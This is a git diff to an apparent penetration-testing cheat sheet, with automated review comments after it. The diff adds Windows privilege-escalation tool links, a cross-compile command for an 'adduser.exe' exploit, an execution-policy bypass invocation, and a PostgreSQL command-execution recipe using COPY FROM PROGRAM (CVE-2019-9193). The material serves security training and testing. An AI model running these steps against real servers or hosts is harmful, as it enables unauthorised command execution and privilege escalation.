diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0dad93f562..08858de941 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -70,6 +70,11 @@ ``` * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) + + ```powershell + powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 + ``` + * [Ping Castle](https://github.com/vletoux/pingcastle) ```powershell diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index e0d6f942f8..d73b0b8b1a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -27,7 +27,8 @@ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ``` - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) -- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated. ](https://github.com/abatchy17/WindowsExploits) +- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) +- [WindowsEnumv - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) ```powershell 
@@ -500,6 +501,12 @@ List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](h ... - [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) +To cross compile a program from Kali, use the following command. + +```powershell +Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c +``` + ## EoP - AlwaysInstallElevated Check if these registry values are set to "1". @@ -560,6 +567,7 @@ $ computer = "" ## References +* [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals) * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) * [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) @@ -569,6 +577,7 @@ $ computer = "" * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) +* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) 
diff --git a/SQL Injection/Images/PostgreSQL_cmd_exec.png b/SQL Injection/Images/PostgreSQL_cmd_exec.png new file mode 100644 index 0000000000..c4bd219065 Binary files /dev/null and b/SQL Injection/Images/PostgreSQL_cmd_exec.png differ diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 8eddd8af98..e8880db890 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -47,6 +47,21 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` +## PostgreSQL - Command execution + +CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. + +```SQL +DROP TABLE IF EXISTS cmd_exec; -- [Optional] Drop the table you want to use if it already exists +CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output +COPY cmd_exec FROM PROGRAM 'id'; -- Run the system command via the COPY FROM PROGRAM function +SELECT * FROM cmd_exec; -- [Optional] View the results +DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table +``` + +![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png) + ## References -* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) \ No newline at end of file +* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) +* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) \ No newline at end of file
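Review bot: In the `Active Directory Attack.md` hunk (@@ -70,6 +70,11), the added invocation `powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1` passes the script path as a positional argument, which powershell.exe interprets as `-Command`; prefer `powershell.exe -ExecutionPolicy Bypass -File .\ADAPE.ps1` so the script is run as a file and any parameters are forwarded to it rather than parsed as part of the command string. From a defensive standpoint it is also worth a short note beside the snippet that `-ExecutionPolicy Bypass` is a process-level override and does not suppress script block logging (Event ID 4104), so the other entries in this list that use the same pattern are equally visible to monitoring.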
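Review bot: In the `Windows - Privilege Escalation.md` hunk (@@ -27,7 +27,8), the new list entry is labelled `WindowsEnumv` while the linked repository is `absolomb/WindowsEnum`; the trailing `v` looks like a typo and should be dropped so the link text matches the project name (`- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)`). The whitespace fix on the preceding `WindowsExploits` line is fine.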
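Review bot: In the hunk at @@ -500,6 +501,12 the cross-compilation snippet is a Linux shell command run on Kali but is fenced as ` ```powershell `; tag it ` ```bash ` (or plain ` ``` `) and drop the `Kali>` prompt prefix so the line can be copied as-is. The compiler name `i586-mingw32msvc-gcc` comes from the deprecated `mingw32` package; current Kali ships `mingw-w64`, whose drivers are `i686-w64-mingw32-gcc` (32-bit) and `x86_64-w64-mingw32-gcc` (64-bit), so the documented command should be updated or both names mentioned. Also "cross compile" should be hyphenated as "cross-compile".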
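Review bot: In the hunk at @@ -560,6 +567,7 the date `02/07/2017` in the new "Windows Internals Book" reference is ambiguous (February 7 or July 2); the other dated entries in this list spell the month out (e.g. "September 18th, 2016", "Mar 20 2019"), so use that form here for consistency.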
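Review bot: In the `PostgreSQL Injection.md` hunk (@@ -47,6 +47,21), the image reference embeds a remote `cdn-images-1.medium.com` URL (and repeats that URL as the alt text) even though this same patch adds `SQL Injection/Images/PostgreSQL_cmd_exec.png` to the repository; point the markdown at the local file with a descriptive alt, e.g. `![PostgreSQL command execution via COPY FROM PROGRAM](Images/PostgreSQL_cmd_exec.png)`, so the page does not depend on a third-party host. The new section should also state the precondition the `COPY ... FROM PROGRAM` example relies on: it only works when the connected role is a superuser (or, from PostgreSQL 11, a member of `pg_execute_server_program`), which is why the PostgreSQL project disputes CVE-2019-9193 as intended behaviour; noting that tells readers what to check and that restricting superuser grants is the mitigation. Minor: `CVE-2019–9193` uses an en dash instead of a hyphen, which breaks searching for the identifier; "if you have a direct access" should read "if you have direct access" and "execute manually the following SQL queries" should read "manually execute the following SQL queries"; and the file still ends without a trailing newline (`\ No newline at end of file`), which would be a good moment to fix.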